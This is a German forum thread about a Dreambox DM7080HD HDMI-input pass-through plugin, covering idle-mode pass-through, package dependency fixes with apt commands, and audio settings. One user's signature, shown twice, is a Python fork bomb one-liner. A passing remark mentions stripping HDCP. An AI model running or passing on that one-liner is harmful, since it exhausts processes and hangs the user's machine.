7080Hd Hdmi In

    • Wenn du die box in idle modus setzt ist der tv off. Und das plugin muss man explizit aufrufen zum durchschleifen.

      Theoretisch ginge das zwar weil zum durchschleifen muss nicht mal enigma2 laufen, aber wie soll der stick sich dann den TV aufdrehen? Soweit ich testen konnte wird nur bild und ton weitergeschleift aber nicht die hdmi-cec befehle.

      Man muesste also eine fire app bauen welche die dreambox uebers web interface den tv andrehen laest.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

    • Genau das macht es ja auch, ...

      Probiers einfach aus :)

      Nur das HDCP muss vorher weg, dann ist das kein Problem.

      Aber die Idee ist im Prinzip gar nicht so schlecht, ich könnte dem Plugin eine Pass-Through on Idle Option verpassen, wenn dann nichts angeschlossen ist wäre das eh fast das gleiche bis das halt der TV nicht abgedreht wird.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

    • In der 0.8 vom HDMI Input Plugin gibt jetzt wie vorgeschlagen auch eine Einstellung dafür das die Box im Idle Modus auf Power das HDMI-IN durchschleifen soll statt den TV abzudrehen.
    • Die Version 0.17 ließ sich im NN2 bei meiner DM7080 erst nach manueller Installation von "librtmp-bin_2.4+git0+feb81c8b3e-r0.4_mipsel.deb" updaten/installieren. Evtl. stimmt da etwas mit den Abhängigkeiten nicht so...
      Ich benötige kein 3D, Doppel-D reicht vollkommen :tongue:
    • Die abhängigkeiten stehen auch genau so im Kit:

      Quellcode

      1. Depends: librtmp-bin, librtmp0, gst-plugins-bad-rtmp, enigma2-plugin-systemplugins-streamserver


      wenn du nicht weist wie man apt-get -f -y install macht damit im DreamOS nachher die Abhängigkeiten nachinstalliert wieden kan ich dir nicht helfen dann musst du es wirklich von Hand einzeln vorher machen.

      Quellcode

      1. apt-get update
      2. dpkg -i /tmp/*.deb
      3. apt-get -f -y install
    • Ist denn librtmp-bin überhaupt auf dem NN2 Feed? Ich habe es mir von dreamboxupdate.com geholt,... über den Paketmanager ließ es sich nicht installieren, eine Fehlermeldung gab es keine.
      Ich benötige kein 3D, Doppel-D reicht vollkommen :tongue:

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Aresta ()

    • deswegen macht man auch das aptg-get update vorher um den Feed zu aktualisieren und ggf nachher mit dem apt-get -f -y die Abhängigkeitenvon dortzu laden.

      Und ich kann mich nicht auch noch um schlecht gepflegte Feeds kümmern.
    • @gutemine
      Dann hast du da irgendetwas verwechselst, Streamserver = rtp/rtsp nicht rtmp :D

      Außerdem zieht das Depend enigma2-plugin-systemplugins-streamserver alle notwendigen Abhängigkeiten automatisch mit:

      Quellcode

      1. root@dm7080:~# apt-cache depends enigma2-plugin-systemplugins-streamserver
      2. enigma2-plugin-systemplugins-streamserver
      3. Depends: dreamrtspserver
      4. Depends: enigma2
      5. root@dm7080:~# apt-cache depends dreamrtspserver
      6. dreamrtspserver
      7. Depends: gstreamer1.0-plugins-good-rtpmanager
      8. Depends: gstreamer1.0-plugins-base-app
      9. Depends: gstreamer1.0-plugins-bad-videoparsersbad
      10. Depends: gstreamer1.0-plugins-bad-mpegtsmux
      11. Depends: gstreamer1.0-plugins-good-rtp
      12. Depends: libgstrtsp-1.0-0
      13. Depends: libgstrtspserver-1.0-0
      14. Depends: gst-plugin-dreamsource
      15. Depends: libgstapp-1.0-0
      16. Depends: libc6
      17. Depends: libglib-2.0-0
      18. Depends: gstreamer1.0-plugins-good-audioparsers
      19. Depends: gstreamer1.0-plugins-good-udp
      20. Depends: gstreamer1.0
      Alles anzeigen
    • Was anderes wenn ich das Plugin verlasse und ich zum TV zurückkehre geht der ton erst wieder wenn ich auf z.b DiscoveryHD gehe wenn ich auf einem SD sender umschalte bleibt der Ton weg jemand eine idee?
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ein bisschen mehr Infos wie du den Ton ausgibst (Direkt zum TV, Audio Verstärker, downmix,...) ware sinnvoll.

      @dhwz

      Ich habe nur cut & paste aus diversen Threads gemacht. Dann nehme ich die unnötigen Depends halt raus - welche soll ich drinnen lassen ?

      Nur das enigma2-plugin-systemplugins-streamserver sollte dann ja reichen,

      EDIT: Es gibt jetzt eine 0.18 wo die Dependencies wie vorgeschlagen bereinigt wurden

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lost in Space ()

    • Axo ja also direkt zum TV
      AC3 Standartmäßig Ja
      AC3 Downmix Ja
      Plugin version 0.17
      Achja ich hab die feeds jetzt aktuallisiert mit dem fehlenden sachen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Probier mal AC3 Standartmäßig Nein

      In der Kombination mit Downmix an macht das mehr Sinn wenn du den TV direkt nur über HDMI-In angeschlossen hat. Weswegen das auch die Default Einstellung ist wenn ich mich recht erinnere,
    • Hallo, ich habe ein Amazon fire TV stick und habe es an der Dreambox 7080Hd in HDMI In aber wenn ich auf dem
      HDMI Eingan Plugin gehe kommt die meldung HDMI Eingang nichts angeschlossen obwohl das Amazon fire TV stick
      angeschlossen habe.

      Was mache ich falsch oder was muss ich machen damit das Amazon fire stick erkannt wird.

      Danke